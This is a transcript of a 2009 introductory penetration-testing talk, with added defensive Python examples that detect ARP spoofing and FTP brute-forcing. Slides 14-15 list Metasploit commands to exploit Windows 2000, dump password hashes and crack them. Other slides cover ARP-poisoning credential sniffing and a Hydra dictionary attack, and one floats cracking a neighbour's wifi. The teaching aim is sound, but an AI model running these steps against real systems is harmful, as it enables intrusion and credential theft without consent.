Hack Attack! An Introduction to Penetration Testing

Transcript

  • 1. Hack Attack! An Introduction to Penetration Testing
    Steve Phillips (aka fraktil)
    2009.12.17 @ SBLUG
  • 2. Who Am I?
    ● Attended UCSB 2004-2008
      – Majored in Math and Philosophy, not CS
    ● Started using Linux in 2001
      – Mandrake, then Slackware, then Debian
    ● Applying for penetration testing job in January
    ● Biases/“Preferences”
      – Linux > Windoze (duh)
      – Python > Ruby
      – Emacs > vi
      – Debian (and variants) > others
  • 3. Can Hacking Be Ethical? Or, what is Ethical Hacking?
    ● Black Hat
      – Compromises computer systems without permission
      – Criminal
    ● White Hat, aka Ethical Hacker
      – Gets paid to hack – legally (friggin' sweet)
      – Always gets permission before attacking a system
    ● Gray Hat
      – Some combination of Black and White
  • 4. The Stages of Hackerdom
    ● Script Kiddie (“skiddie”)
      – Can only run automated tools
      – Doesn't understand underlying technology
    ● Advanced Beginner
      – Mastered advanced features of many tools
      – Knows enough programming to create own tools
    ● C => Python, Ruby (see next slide)
    ● Uberhacker
      – Discovers new vulnerabilities (or new types of vulns)
      – Knows Assembly, C, Python and/or Ruby, SQL
      – Excellent programmer; writes tools, scripts regularly
      – Can defend as well as attack (firewalls, IDS, etc)
  • 5. Programming Languages Used to Create Hacking Tools
    ● C
      – Nmap (network mapper, portscanner, more)
      – Nessus (vulnerability detection)
      – Wireshark (network sniffer)
    ● Python
      – w3af (web app attack framework)
      – sqlmap (automatic SQL injection)
      – TheMiddler (session hijacking, targeted pw sniffing)
    ● Ruby
      – Metasploit (vuln exploitation, much more)
  • 6. What About in Back|Track 4? Overall: Tools + Exploits
    ● File count: find /pentest | grep .c$ | wc -l
    ● Line count: cat $(find /pentest | grep .c$) | wc -l
    ● C: 4058 .c files, 1,300,000 lines
    ● Python: 2431 .py files, 612,000 lines
    ● Ruby: 5468 .rb files, 694,000 lines
      – 2773 files from Metasploit
      – 1271 files from Dradis (information organizing, sharing)
      – 1424 other
    ● C++: 431 .cpp files, 144,000 lines
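The slide's `find /pentest | grep .c$ | wc -l` one-liner does the per-language census by hand, and because `.` in a grep pattern matches any character, `.c$` also counts names such as `foo.pyc` or `misc`. The script below is an added example, not from the talk or from BackTrack: it walks a tree, matches the real file suffix, and reports file and line counts per language in one pass. The sample tree it builds (paths, line counts) is constructed purely for illustration.

```python
"""Count source files and lines per language under a directory tree.

Added example (not from the slides). Matching on the real suffix avoids the
false matches that `grep .c$` produces, where `.` matches any character.
"""
import os
import tempfile
from collections import defaultdict

# Suffix -> language name, the same four languages the slide tallies
LANGUAGES = {".c": "C", ".py": "Python", ".rb": "Ruby", ".cpp": "C++"}


def count_sources(root):
    """Return {language: (file_count, line_count)} for files under root."""
    totals = defaultdict(lambda: [0, 0])
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            lang = LANGUAGES.get(os.path.splitext(name)[1])
            if lang is None:
                continue
            with open(os.path.join(dirpath, name), "rb") as fh:
                lines = sum(1 for _ in fh)
            totals[lang][0] += 1
            totals[lang][1] += lines
    return {lang: tuple(v) for lang, v in totals.items()}


# Constructed sample tree: (relative path, number of lines)
SAMPLE_FILES = [
    ("exploits/a.c", 10),
    ("exploits/b.c", 5),
    ("tools/x.py", 7),
    ("tools/y.pyc", 100),  # would be miscounted as C by `grep .c$`
    ("tools/z.rb", 3),
    ("misc", 50),          # also matches `grep .c$`
]


def build_sample_tree(root):
    """Write the constructed sample files under root."""
    for rel, nlines in SAMPLE_FILES:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("x\n" * nlines)


def demo():
    """Build the sample tree in a temp dir and return the per-language totals."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return count_sources(root)


if __name__ == "__main__":
    for lang, (files, lines) in sorted(demo().items()):
        print(f"{lang}: {files} files, {lines} lines")
```

Run against the sample tree, only the `.c`, `.py` and `.rb` files are counted; the `.pyc` file and `misc` are ignored, which is exactly where the grep version would have inflated the C total.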
  • 7. What About in Back|Track 4? Exploits Only (from exploitdb)
    ● C – 1321 .c files
    ● Python – 405 .py files
    ● Ruby – 146 .rb files
    ● C++ – 110 .cpp files
  • 8. TIOBE Index Programming Language Popularity
  • 9. Back|Track 4 Categories
    ● Information Gathering
      – Email addresses, DNS
    ● Network Mapping
    ● Vulnerability Identification
    ● Web Application Analysis
    ● Radio Network Analysis
    ● Penetration (not that kind)
  • 10. Back|Track 4 Categories
    ● Privilege Escalation
    ● Maintaining Access
    ● Digital Forensics
    ● Reverse Engineering
    ● VoIP (Voice over Internet Protocol)
    ● Misc
  • 11. DEMO: Sniffing Passwords with Ettercap
    ● ARP Poisoning for MitM Attack
      – Associate attacker's MAC with router's IP
      – Target tries to route traffic through router
        ● Routes it through attacker instead
      – Attacker forwards traffic both ways
      – Attacker can silently watch or inject traffic
    ● TheMiddler, sslstrip
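The poisoning the slide describes has two symptoms a defender can see on the wire: the router's IP suddenly answers from a different MAC, and one MAC starts answering for several IPs (the router's and the victim's). The detector below is an added example, not part of the talk or of Ettercap; it runs over a constructed list of ARP replies with placeholder addresses and a constructed table of trusted bindings, which in practice you would seed from the switch or DHCP server.

```python
"""Flag ARP-cache poisoning from a stream of observed ARP replies.

Added example (not from the slides). Input is (time, sender_ip, sender_mac)
tuples; in real use these come from a sniffer such as Wireshark or arpwatch.
"""
from collections import defaultdict

# Trusted IP -> MAC bindings (constructed for this example)
KNOWN_BINDINGS = {
    "192.168.1.1": "aa:bb:cc:00:00:01",   # the router
}

# Constructed ARP replies as (time_sec, sender_ip, sender_mac)
SAMPLE_REPLIES = [
    (0.0, "192.168.1.1", "aa:bb:cc:00:00:01"),   # legitimate router reply
    (1.0, "192.168.1.20", "aa:bb:cc:00:00:20"),  # a host on the LAN
    (5.0, "192.168.1.1", "aa:bb:cc:00:00:99"),   # router IP, different MAC
    (5.1, "192.168.1.20", "aa:bb:cc:00:00:99"),  # same MAC now claims the host too
    (6.0, "192.168.1.1", "aa:bb:cc:00:00:99"),   # repeated to keep caches poisoned
]


def detect_arp_spoofing(replies, known=None):
    """Return a list of alert strings; an empty list means nothing suspicious."""
    known = {ip: mac.lower() for ip, mac in (known or {}).items()}
    ip_to_mac = dict(known)          # trusted binding, or first MAC seen, per IP
    mac_to_ips = defaultdict(set)    # which IPs each MAC has answered for
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        prev = ip_to_mac.get(ip)
        if prev is None:
            ip_to_mac[ip] = mac
        elif prev != mac:
            source = "trusted binding" if ip in known else "earlier reply"
            alerts.append(f"t={ts}: {ip} now claimed by {mac}, {source} was {prev}")
        ips = mac_to_ips[mac]
        if ips and ip not in ips:
            alerts.append(f"t={ts}: {mac} answers for multiple IPs {sorted(ips | {ip})}")
        ips.add(ip)
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoofing(SAMPLE_REPLIES, KNOWN_BINDINGS):
        print(line)
```

On the sample data the first two replies are clean; the third fires on the router's binding, and the fourth fires twice (the host's MAC changed, and one MAC now covers two IPs). Static ARP entries for the gateway or dynamic ARP inspection on the switch stop the attack outright; this kind of monitoring tells you it was attempted.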
  • 12. How Else Can We Get Creds?
    ● Phishing
      – Via email
    ● Spear Phishing
      – Becoming popular
      – Very hard to stop
    ● In-person Social Engineering
      – Kevin Mitnick is famous for this
    ● Brute force
  • 13. DEMO: Bruteforcing FTP
    ● Using Hydra to bruteforce weak FTP password
      – Well, really a dictionary attack
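A dictionary attack like the one demoed here leaves an unmistakable trace in the server's authentication log: a burst of failed logins from one source, often followed by a success. The detector below is an added example, not from the talk and not tied to Hydra; the log line format and the sample lines are constructed for this example, so the regex would be adapted to the real FTP server's log.

```python
"""Flag FTP login brute-forcing from authentication log lines.

Added example (not from the slides). The log format is constructed:
  <YYYY-MM-DD HH:MM:SS> <OK|FAIL> LOGIN: Client "<ip>" user=<name>
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) '
    r'(?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[\d.]+)" user=(?P<user>\S+)$'
)

# Constructed sample log: one legitimate login, one dictionary attack that
# eventually succeeds, and two unrelated failures far apart in time.
SAMPLE_LOG = """\
2009-12-17 20:00:01 OK LOGIN: Client "10.0.0.5" user=alice
2009-12-17 20:00:10 FAIL LOGIN: Client "10.0.0.9" user=admin
2009-12-17 20:00:11 FAIL LOGIN: Client "10.0.0.9" user=admin
2009-12-17 20:00:11 FAIL LOGIN: Client "10.0.0.9" user=admin
2009-12-17 20:00:12 FAIL LOGIN: Client "10.0.0.9" user=admin
2009-12-17 20:00:12 FAIL LOGIN: Client "10.0.0.9" user=admin
2009-12-17 20:00:13 OK LOGIN: Client "10.0.0.9" user=admin
2009-12-17 20:05:00 FAIL LOGIN: Client "10.0.0.7" user=bob
2009-12-17 20:30:00 FAIL LOGIN: Client "10.0.0.7" user=bob
"""


def parse_line(line):
    """Return (timestamp, result, ip, user) or None for an unrecognised line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
    return ts, m["result"], m["ip"], m["user"]


def detect_bruteforce(log_text, threshold=5, window_sec=60):
    """Return {ip: {"failures": n, "users": set, "success_after": bool}}
    for every source with >= threshold failures inside a sliding window."""
    recent = defaultdict(deque)   # ip -> timestamps of failures in the window
    flagged = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, result, ip, user = rec
        if result == "FAIL":
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_sec:
                q.popleft()               # drop failures outside the window
            if len(q) >= threshold:
                entry = flagged.setdefault(
                    ip, {"failures": 0, "users": set(), "success_after": False})
                entry["failures"] = max(entry["failures"], len(q))
                entry["users"].add(user)
        elif ip in flagged:
            flagged[ip]["success_after"] = True   # the guessing paid off
    return flagged


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

With the defaults (5 failures within 60 seconds) only 10.0.0.9 is flagged, and `success_after` marks that the account was then logged into, which is the case that needs an incident response rather than just a block. The two failures from 10.0.0.7 are 25 minutes apart and stay below the threshold. Lockout or rate limiting after a few failures, and passwords that are not in any wordlist, are what make the demoed attack fail in the first place.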
  • 14. DEMO: Pwning Win2k
    ● Create database (or connect to existing)
      – db_create [optional_database_name]
    ● Find win2k box using nmap (in metasploit)
      – db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24
    ● Search Metasploit for win2k exploits
      – search 2000
    ● Use exploit w/meterpreter
      – use exploit/windows/smb/ms05_039_pnp
      – set PAYLOAD windows/meterpreter/bind_tcp
    ● Which parameters still need to be set?
      – show options
  • 15. DEMO: Pwning Win2k
    ● Set parameters
      – set RHOST [target_ip]
    ● Now we exploit! Can you guess the command?
      – exploit
    ● Get hashes
      – hashdump
      – This would be much harder without meterpreter!
    ● Copy and paste hashes into new text file
    ● Crack hashes with john the ripper
      – ./john [file_containing_hashes].txt
    ● Game Over
  • 16. Why Become an Ethical Hacker?
    ● Field is growing (see next slide)
      – New laws, regulations
      – US government falling behind in cyber security
    ● You get paid to hack – need I say more?
      – Banks
      – Telecoms
      – Casinos
      – Foreign countries (for the federal gov't)
  • 17. How Can I Practice Legally?
    ● Virtualization (VMware, VirtualBox)
      – Use virtual images from recent CTF competitions
        ● http://lampsecurity.org/capture-the-flag-6
        ● http://ctf.hcesperer.org/25c3ctf
        ● http://ctf.hcesperer.org/daopen08
        ● http://ctf.hcesperer.org/eh08ctf
    ● NetWars
      – Part of government's Cyber Defense Initiative 2009
    ● DVL: Damn Vulnerable Linux
      – Purposely misconfigured, exploitable
      – http://tinyurl.com/dvllinux15
  • 18. Further Resources: Learning
    ● Metasploit
      – Online Class: http://www.offensive-security.com/metasploit-unleashed/
    ● Nmap Guide
      – http://nmap.org/book/man.html
    ● Security Videos, Tutorials
      – http://securitytube.net
  • 19. Tools Added to Back|Track: Extra Tools I Used
    ● Metasploit 3.3.2 (updated)
    ● Nmap 5.0 (updated)
    ● Exploitdb archive (/pentest/exploits/exploitdb)
  • 20. Summary
    ● Hacking can be ethical
    ● “Computer security” is an oxymoron
      – No one is safe
    ● REALLY powerful hacking tools exist
    ● Metasploit is effing dangerous
  • 21. Future Demos?
    ● More local fun
      – Crack neighbor's wifi (WEP)
      – Exploit remote vuln in DD-WRT firmware
      – Redirecting traffic using fake DNS server
      – Intercepting Twitter, Facebook, LinkedIn creds
    ● More like real pen testing
      – SQL injection
      – XSS
      – Nessus scan
  • 22. Contact Information
    ● Name: Steve Phillips
    ● New Blog: SweetHack.blogspot.com
    ● Email: fraktil@gmail.com
    ● Twitter: twitter.com/fraktil
    ● LinkedIn: linkedin.com/in/sdphillips
    ● IRC: fraktil in #sblug on borg-cube.com
  • 23. Questions?